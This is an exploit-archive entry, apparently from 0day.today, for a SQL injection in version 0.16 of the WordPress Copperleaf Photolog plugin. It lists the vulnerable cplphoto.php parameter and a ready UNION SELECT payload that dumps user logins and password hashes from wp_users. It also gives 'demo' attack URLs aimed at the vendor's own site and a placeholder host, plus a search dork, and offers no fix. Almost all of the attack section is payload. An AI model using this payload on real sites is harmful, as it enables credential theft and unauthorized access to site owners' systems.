id: 10906
date: 02/15/2010
title: WordPress Copperleaf Photolog SQL injection
author: kaMtiEz
cves: 

===========================================
WordPress Copperleaf Photolog SQL injection
===========================================

[ Software Information ]
 
[+] Vendor : http://www.copperleaf.org/
[+] Download : http://www.copperleaf.org/wp-content/code/cpl0.16.zip
[+] version : 0.16 / lower maybe also affected
[+] Vulnerability : SQL
[+] Dork : "CiHuY"
[+] LOCATION : INDONESIA - JOGJA
#############################################################################################################
 
[ Vulnerable File ]
 
http://127.0.0.1/[kaMtiEz]/wp-content/plugins/cpl/cplphoto.php?postid=[INDONESIANCODER]&id=[VALID ID]
 
[ XpL]
 
+and+1=1+union+all+select+1,2,concat(user_login,0x3a,user_pass),4,5,6,7,8,9,10,11,12+from+wp_users--
 
[ DEMO ]
 
[+] Demo Vendor
 
http://www.copperleaf.org/wp-content/themes/limon/cplphoto.php?postid=416+and+1=1+union+all+select+1,2,concat(user_login,0x3a,user_pass),4,5,6,7,8,9,10,11,12+from+wp_users--&id=2097
 
[+] Demo plugins
 
http://demo.com/wp-content/plugins/cpl/cplphoto.php?postid=11+and+1=1+union+all+select+1,2,concat(user_login,0x3a,user_pass),4,5,6,7,8,9,10,11,12+from+wp_users--&id=11
 
[ FIX ]
 
dunno :">



#  0day.today [2023-03-26]  #